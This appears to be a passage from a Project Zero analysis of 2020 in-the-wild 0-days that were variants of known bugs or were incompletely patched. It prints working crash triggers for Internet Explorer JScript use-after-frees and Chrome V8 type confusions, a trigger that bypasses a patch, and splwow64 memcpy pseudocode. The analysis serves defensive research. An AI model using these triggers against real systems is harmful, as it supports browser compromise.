for (var i = 0; i < 20000; i++) spray[i] = new Object();
// 3. Store a reference to one of them in one of the named arguments
// The named arguments aren't tracked by garbage collector
+ arg1 = spray[5000];
- arguments[0] = spray[5000];
// 4. Delete the objects and call the garbage collector
// All JScript variables get reclaimed...
for (var i = 0; i < 20000; i++) spray[i] = 1;
CollectGarbage();
// 5. But we still have reference to one of them in
// a named argument
+ alert(arg1);
- alert(arguments[0]);
}

// 1. Call sort with a custom callback
[1,2].sort(F);
```

### CVE-2020-0968

Unfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>), another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the [advisory](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>)).

```javascript
var spray = new Array();

function f1() {
  alert('callback 1');
  return spray[6000];
}

function f2() {
  alert('callback 2');
  spray = null;
  CollectGarbage();
  return 'a';
}

function boom() {
  var e = o1;
  var d = o2;
  // 3. the first callback (e.toString) happens
  // it returns one of the string variables
  // which is stored in a temporary variable
  // on the stack, not tracked by garbage collector
  // 4. Second callback (d.toString) happens
  // There, string variables get freed
  // and the space reclaimed
  // 5. Crash happens when attempting to access
  // string content of the temporary variable
  var b = e + d;
  alert(b);
}

// 1. create two objects with toString callbacks
var o1 = { toString: f1 };
var o2 = { toString: f2 };

// 2. create a bunch of string variables
for (var a = 0; a < 20000; a++) {
  spray[a] = "aaa";
}

boom();
```

In addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of “plug and play” quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit.

## Firefox CVE-2020-6820

Mozilla patched [CVE-2020-6820 in Firefox with an out-of-band security update](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/>) in April 2020. It is a use-after-free in the Cache subsystem.

CVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl (it must be the Parent, which lives in the browser process, in order to get the use-after-free in the browser process; the Child would only provide one in the renderer) still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed.
The mId member of the CacheStreamControlParent is then subsequently accessed, causing the use-after-free.

The execution path for CVE-2020-6820 is:

```text
StreamList::CloseAll                                      ← Patched function
  CacheStreamControlParent::CloseAll
    CacheStreamControlParent::NotifyCloseAll
      StreamControl::CloseAllReadStreams
        For each stream:
          ReadStream::Inner::CloseStream
            ReadStream::Inner::Close
              ReadStream::Inner::NoteClosed
                …
                StreamControl::NoteClosed
                  StreamControl::ForgetReadStream
                    CacheStreamControlParent/Child::NoteClosedAfterForget
                      CacheStreamControlParent::RecvNoteClosed
                        StreamList::NoteClosed
                          If StreamList is empty && mStreamControl:
                            CacheStreamControlParent::Shutdown
                              Send__delete(this)          ← FREED HERE!
    PCacheStreamControlParent::SendCloseAll               ← Used here in call to Id()
```

CVE-2020-6820 is a variant of an internally found Mozilla vulnerability, [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>). 1507180 was discovered in November 2018 and [patched in December 2019](<https://hg.mozilla.org/mozilla-central/rev/cdf525897bff>). 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, [an explanatory comment](<https://hg.mozilla.org/mozilla-central/rev/25beb671c14a>) for why the December 2019 patch was needed was added in early March 2020.

For 1507180 the execution path was the same as for CVE-2020-6820 except that the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls “higher” in StreamList::CloseAll.

In my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [[1](<https://bugzilla.mozilla.org/show_bug.cgi?id=1626728#c15>), [2](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180#c10>)]) has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn’t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our [in-the-wild tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>) and thus is included in this list.

## Chrome for Android CVE-2020-6572

[CVE-2020-6572](<https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_7.html>) is a use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned to another, going out of scope, which means it can be deleted, while at the same time a raw pointer into the originally referenced object isn't updated.

More specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder).
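The ownership pattern just described, as an added example that is not Chromium's code: a decoder owns its CDM through a `unique_ptr` and keeps a raw pointer to a context the CDM owns; the class and member names mirror the text, the `Cdm` stand-in, the liveness registry and the "hardened" variant are assumptions made for this illustration, not the upstream patch.

```cpp
// Added example, not Chromium's code: a reduced model of the ownership
// pattern behind CVE-2020-6572. The decoder owns its CDM through a
// unique_ptr (cdm_context_ref_) and keeps a raw pointer to a context object
// the CDM owns (media_crypto_context_). A second Initialize() with a
// different CDM replaces the unique_ptr, destroying the old CDM and its
// context; the vulnerable shape skips re-fetching the raw pointer.
#include <memory>
#include <set>
#include <utility>

struct MediaCryptoContext { int cdm_id; };

// Registry of context objects currently alive (an assumption of this model).
// Only pointer values are stored and compared, so the liveness check never
// dereferences a stale pointer.
static std::set<const MediaCryptoContext*>& live_contexts() {
    static std::set<const MediaCryptoContext*> live;
    return live;
}

// Stand-in for the CDM behind cdm_context_ref_; it owns exactly one context.
class Cdm {
public:
    explicit Cdm(int id) : ctx_{id} { live_contexts().insert(&ctx_); }
    ~Cdm() { live_contexts().erase(&ctx_); }
    Cdm(const Cdm&) = delete;
    Cdm& operator=(const Cdm&) = delete;
    MediaCryptoContext* context() { return &ctx_; }
private:
    MediaCryptoContext ctx_;
};

// Vulnerable shape: the CDM-dependent setup runs only on the first
// Initialize(); a later call swaps the owner but keeps the raw pointer.
class VulnerableDecoder {
public:
    void Initialize(std::unique_ptr<Cdm> cdm) {
        cdm_context_ref_ = std::move(cdm);       // previous CDM destroyed here
        if (media_crypto_ready_) return;          // second init: setup skipped
        media_crypto_context_ = cdm_context_ref_->context();
        media_crypto_ready_ = true;
    }
    // True when media_crypto_context_ still points at a live object.
    bool ContextIsLive() const {
        return live_contexts().count(media_crypto_context_) != 0;
    }
private:
    std::unique_ptr<Cdm> cdm_context_ref_;
    MediaCryptoContext* media_crypto_context_ = nullptr;
    bool media_crypto_ready_ = false;
};

// Hardened shape (illustrative, not the exact upstream fix): the raw pointer
// is dropped before the owner changes and re-derived from the new owner.
class HardenedDecoder {
public:
    void Initialize(std::unique_ptr<Cdm> cdm) {
        media_crypto_context_ = nullptr;          // no stale view survives
        cdm_context_ref_ = std::move(cdm);
        media_crypto_context_ = cdm_context_ref_->context();
    }
    bool ContextIsLive() const {
        return live_contexts().count(media_crypto_context_) != 0;
    }
private:
    std::unique_ptr<Cdm> cdm_context_ref_;
    MediaCryptoContext* media_crypto_context_ = nullptr;
};

// Runs the two-Initialize sequence from the text (second call with a
// different CDM) and reports whether the decoder ends up holding a
// dangling context pointer.
bool ends_with_dangling_context(bool use_hardened) {
    if (use_hardened) {
        HardenedDecoder d;
        d.Initialize(std::make_unique<Cdm>(1));
        d.Initialize(std::make_unique<Cdm>(2));   // different CDM
        return !d.ContextIsLive();
    }
    VulnerableDecoder d;
    d.Initialize(std::make_unique<Cdm>(1));
    d.Initialize(std::make_unique<Cdm>(2));       // different CDM
    return !d.ContextIsLive();                    // true: pointer is stale
}
```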
\n\nThis vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle [reported a very similar vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730>), [CVE-2019-13695](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop.html>). CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it\u2019s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.\n\nIn addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The [vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311>) is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is [CVE-2019-5870](<https://chromereleases.googleblog.com/2019/09/stable-channel-update-for-desktop.html>). Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, \u201c[TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>)\u201d. 
\n\nWhile one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This [was noted in the issue tracker ](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311#c8>)for CVE-2019-5870 and then [brought up again](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730#c1>) after Man Yue Mo reported CVE-2019-13695.\n\n## Windows splwow64 CVE-2020-0986\n\n[CVE-2020-0986](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and [CVE-2019-0880](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0880>), which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D. 
\n\nFrom this [great write-up from ByteRaptors](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>) on CVE-2019-0880 the pseudo code that allows the controlling of the memcpy is:\n\nvoid GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)\n\n{\n\n...\n\nif(*((BYTE*)(firstAddress + 0x4)) == 0x75){\n\nULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));\n\nif(memcpyDestinationAddress != NULL){\n\nULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));\n\nDWORD copySize = *((DWORD*)(firstAddress + 0x28));\n\nmemcpy(memcpyDestinationAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nThe equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed as highlighted below.\n\nvoid GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)\n\n{\n\n...\n\nif(*((BYTE*)(msgSend + 0x4)) == 0x6D){\n\n...\n\nULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));\n\nif(srcAddress != NULL){\n\nDWORD copySize = *((DWORD*)(msgSend + 0x40));\n\nif(copySize <= 0x1FFFE) {\n\nULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));\n\nmemcpy(destAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nIn addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the \u201cExploited 0-days not properly fixed\u201d section below.\n\n## Freetype CVE-2020-15999\n\nIn October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, [CVE-2020-15999](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>). 
[The vulnerability is a heap buffer overflow](<https://savannah.nongnu.org/bugs/?59308>) in the `Load_SBit_Png` function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.

In November 2014, Project Zero team member [Mateusz Jurczyk reported CVE-2014-9665](<https://bugs.chromium.org/p/project-zero/issues/detail?id=168>) to Freetype. CVE-2014-9665 is also a heap buffer overflow in the `Load_SBit_Png` function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small.

To patch CVE-2014-9665, [Freetype added a check to the rows and width](<http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/sfnt/pngshim.c?id=54abd22891bd51ef8b533b24df53b3019b5cee81>) prior to calculating the size as shown below.

```diff
  if ( populate_map_and_metrics )
  {
    FT_Long  size;

    metrics->width  = (FT_Int)imgWidth;
    metrics->height = (FT_Int)imgHeight;

    map->width      = metrics->width;
    map->rows       = metrics->height;
    map->pixel_mode = FT_PIXEL_MODE_BGRA;
    map->pitch      = map->width * 4;
    map->num_grays  = 256;

+   /* reject too large bitmaps similarly to the rasterizer */
+   if ( map->rows > 0x7FFF || map->width > 0x7FFF )
+   {
+     error = FT_THROW( Array_Too_Large );
+     goto DestroyExit;
+   }

    size = map->rows * map->pitch;   /* <- overflow size */

    error = ft_glyphslot_alloc_bitmap( slot, size );
    if ( error )
      goto DestroyExit;
  }
```

To patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_SBit_Png` function and changed to `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG.

```diff
  if ( populate_map_and_metrics )
  {
+   /* reject too large bitmaps similarly to the rasterizer */
+   if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )
+   {
+     error = FT_THROW( Array_Too_Large );
+     goto DestroyExit;
+   }
+
    metrics->width  = (FT_UShort)imgWidth;
    metrics->height = (FT_UShort)imgHeight;

    map->width      = metrics->width;
    map->rows       = metrics->height;
    map->pixel_mode = FT_PIXEL_MODE_BGRA;
    map->pitch      = map->width * 4;
    map->num_grays  = 256;

-   /* reject too large bitmaps similarly to the rasterizer */
-   if ( map->rows > 0x7FFF || map->width > 0x7FFF )
-   {
-     error = FT_THROW( Array_Too_Large );
-     goto DestroyExit;
-   }

    [...]
```
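As an added example (not FreeType's code) that models the size computations just shown: a pre-2014 shape with no check and a 32-bit size models the CVE-2014-9665 overflow, the check placed after the truncating assignment models the code CVE-2020-15999 was found in, and the check placed before truncation models the 2020 fix. Struct and function names are constructed; the 0x7FFF limit is the one from the patches, and the 32-bit size is an assumption about the affected builds.

```c
#include <stdint.h>
#include <stdio.h>

#define SBIT_MAX_DIM 0x7FFF  /* the limit both FreeType checks use */

typedef enum { SBIT_OK = 0, SBIT_ARRAY_TOO_LARGE = 1 } sbit_status;

/* What each size computation decides: the buffer it would allocate, and the
 * number of bytes the PNG decoder writes using the original 32-bit dimensions. */
struct sbit_result {
    sbit_status status;
    uint64_t    alloc_size;   /* rows * pitch as the FreeType code computes it */
    uint64_t    needed_size;  /* imgWidth * 4 * imgHeight                      */
};

static uint64_t needed_bytes(uint32_t imgWidth, uint32_t imgHeight)
{
    return (uint64_t)imgWidth * 4u * imgHeight;
}

/* Pre-2014 shape (the CVE-2014-9665 bug): no bounds check, and the size is a
 * 32-bit integer here to model the overflow on builds where FT_Long is 32 bits (assumption). */
struct sbit_result sbit_size_unchecked(uint32_t imgWidth, uint32_t imgHeight)
{
    struct sbit_result r = { SBIT_OK, 0, 0 };
    uint32_t pitch = imgWidth * 4u;           /* width is not truncated here */
    uint32_t size  = imgHeight * pitch;       /* can wrap to a small value   */
    r.alloc_size  = size;
    r.needed_size = needed_bytes(imgWidth, imgHeight);
    return r;
}

/* The check as positioned by the CVE-2014-9665 fix, with the metrics stored as
 * FT_UShort as in the code CVE-2020-15999 was found in: assign (truncating) first,
 * then check the truncated metrics. A width such as 0x10001 becomes 1 and passes. */
struct sbit_result sbit_size_check_after(uint32_t imgWidth, uint32_t imgHeight)
{
    struct sbit_result r = { SBIT_OK, 0, 0 };
    uint16_t width = (uint16_t)imgWidth;      /* metrics->width  = (FT_UShort)imgWidth  */
    uint16_t rows  = (uint16_t)imgHeight;     /* metrics->height = (FT_UShort)imgHeight */
    uint32_t pitch = (uint32_t)width * 4u;
    if (rows > SBIT_MAX_DIM || width > SBIT_MAX_DIM) {
        r.status = SBIT_ARRAY_TOO_LARGE;
        return r;
    }
    r.alloc_size  = (uint64_t)rows * pitch;
    r.needed_size = needed_bytes(imgWidth, imgHeight);
    return r;
}

/* The CVE-2020-15999 fix: check the 32-bit header values before truncating,
 * so any value that survives the check fits in FT_UShort unchanged. */
struct sbit_result sbit_size_check_before(uint32_t imgWidth, uint32_t imgHeight)
{
    struct sbit_result r = { SBIT_OK, 0, 0 };
    if (imgWidth > SBIT_MAX_DIM || imgHeight > SBIT_MAX_DIM) {
        r.status = SBIT_ARRAY_TOO_LARGE;
        return r;
    }
    uint16_t width = (uint16_t)imgWidth;      /* lossless after the check */
    uint16_t rows  = (uint16_t)imgHeight;
    uint32_t pitch = (uint32_t)width * 4u;
    r.alloc_size  = (uint64_t)rows * pitch;
    r.needed_size = needed_bytes(imgWidth, imgHeight);
    return r;
}

/* 1 if the computation accepted the bitmap but would allocate fewer bytes than
 * the decoder writes, i.e. the heap buffer overflow condition. */
int sbit_undersized(struct sbit_result r)
{
    return r.status == SBIT_OK && r.alloc_size < r.needed_size;
}

int main(void)
{
    /* Constructed header values: one pair that wraps the 32-bit size, one that truncates. */
    struct sbit_result a = sbit_size_unchecked(0x10000u, 0x10000u);
    struct sbit_result b = sbit_size_check_after(0x10001u, 1u);
    struct sbit_result c = sbit_size_check_before(0x10001u, 1u);
    printf("unchecked    0x10000 x 0x10000: alloc %llu, needed %llu, undersized %d\n",
           (unsigned long long)a.alloc_size, (unsigned long long)a.needed_size, sbit_undersized(a));
    printf("check after  0x10001 x 1:       alloc %llu, needed %llu, undersized %d\n",
           (unsigned long long)b.alloc_size, (unsigned long long)b.needed_size, sbit_undersized(b));
    printf("check before 0x10001 x 1:       rejected %d\n", c.status == SBIT_ARRAY_TOO_LARGE);
    return 0;
}
```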

To summarize:

* CVE-2014-9665 caused a buffer overflow by overflowing the size field in the `size = map->rows * map->pitch;` calculation.
* CVE-2020-15999 caused a buffer overflow by truncating `metrics->width` and `metrics->height`, which are then used to calculate the size field, thus causing the size field to be too small.

A fix for the root cause of the buffer overflow in November 2014 would have been to bounds check `imgWidth` and `imgHeight` prior to any assignments to an unsigned short. Including the bounds check of the height and width from the PNG headers early would have prevented both manners of triggering this buffer overflow.

## Apple Safari CVE-2020-27930

This vulnerability is slightly different than the rest in that, while it’s still a variant, it’s not clear that by current disclosure norms one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there’s no true “upstream”. However, when vulnerabilities were reported in Microsoft’s, Apple’s, or Adobe’s fork, there is a possibility (though no guarantee) that it was also in the others.

The CVE-2020-27930 vulnerability was used in an exploit chain for iOS. The [variant, CVE-2015-0993, was reported](<http://bugs.chromium.org/p/project-zero/issues/detail?id=180>) to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft’s implementation of Adobe’s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly the case when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack.

[CVE-2020-27930](<https://support.apple.com/en-us/HT211929>), the vulnerability exploited in-the-wild in 2020, is very similar.
The vulnerability this time is in the callothersubr operator in Apple’s implementation of Adobe’s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write.

Six years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: how do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There’s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.

# Exploited 0-days not properly fixed… 😭

Three vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor.

| Product | Vulnerability that was exploited in-the-wild | 2nd patch |
|---|---|---|
| Internet Explorer | CVE-2020-0674 | CVE-2020-0968 |
| Google Chrome | CVE-2019-13764* | CVE-2020-6383 |
| Microsoft Windows | CVE-2020-0986 | CVE-2020-17008/CVE-2021-1648 |

\* When CVE-2019-13764 was patched, it was not known to be exploited in-the-wild.

## Internet Explorer JScript CVE-2020-0674

In the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, its patch still didn’t comprehensively fix all of the variants. Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>) in April 2020.
We show the trigger in the section above.

## Google Chrome CVE-2019-13674

[CVE-2019-13674](<https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html>) in Chrome is an interesting case. When it was [patched in November 2019](<https://chromium.googlesource.com/v8/v8/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>), it was not known to be exploited in-the-wild. Instead, [it was reported by security researchers Soyeon Park and Wen Xu](<https://bugs.chromium.org/p/chromium/issues/detail?id=1028863>). Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That’s when he realized that the patch didn’t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei’s blog post, “[Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)”.

To summarize, the vulnerability is a type confusion in Chrome’s v8 Javascript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8’s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect to v8’s integer type is that it is not closed under addition, meaning that adding two integers doesn’t always result in an integer. An example of this is +Infinity + -Infinity = NaN.

Therefore, the following line is sufficient to trigger CVE-2019-13674.
Note that this line will not show any observable crash effects, and the road to making this vulnerability exploitable is quite long; check out [this blog post](<https://googleprojectzero.blogspot.com/>) if you’re interested!

```javascript
for (var i = -Infinity; i < 0; i += Infinity) { }
```

[The patch](<https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>) that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.

```javascript
var increment = -Infinity;
var k = 0;
// The initial loop value is 0 and the increment is -Infinity.
// This is permissible because 0 + -Infinity = -Infinity, an integer.
for (var i = 0; i < 1; i += increment) {
  if (i == -Infinity) {
    // Once the initial variable equals -Infinity (one loop through)
    // the increment is changed to +Infinity. -Infinity + +Infinity = NaN
    increment = +Infinity;
  }
  if (++k > 10) {
    break;
  }
}
```

To “revive” the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. [This incomplete fix was reported](<https://bugs.chromium.org/p/chromium/issues/detail?id=1051017>) to Chrome in February 2020. [This patch](<https://chromium.googlesource.com/v8/v8.git/+/a2e971c56d1c46f7c71ccaf33057057308cc8484>) was more conservative: it bailed out as soon as the typer detected that the increment can be +Infinity or -Infinity.

Unfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible “type confusions”.
Again, check out [Sergei’s blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>) if you’re interested in more details.

This is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it’s important to work towards “correct & comprehensive” patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry [knows there is a detection gap](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) in our ability to detect 0-days exploited in-the-wild. We don’t find and detect all exploited 0-days and we certainly don’t find them all in a timely manner.

## Windows splwow64 CVE-2020-0986

This vulnerability has already been discussed in the previous section on variants. After [Kaspersky reported that CVE-2020-0986 was actively exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only [disclosed as exploited in-the-wild in August 2020](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>).

Microsoft’s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message with offsets. This didn’t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. [This issue was reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later.
This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.

# Correct and comprehensive patches

We’ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes.

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension.
While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

While the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.

In 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We also hope to expand into variant analysis work on other vulnerabilities. We hope more researchers will join us in this work. (If you’re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: [my talk at BluehatIL 2020](<https://www.youtube.com/watch?v=mC1Pwsdy814>) and [Ki Chan Ahn at OffensiveCon 2020](<https://www.youtube.com/watch?v=fTNzylTMYks>).)

In addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone.
Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.

Source: Project Zero, “Déjà vu-lnerability”, published 2021-02-03, https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html
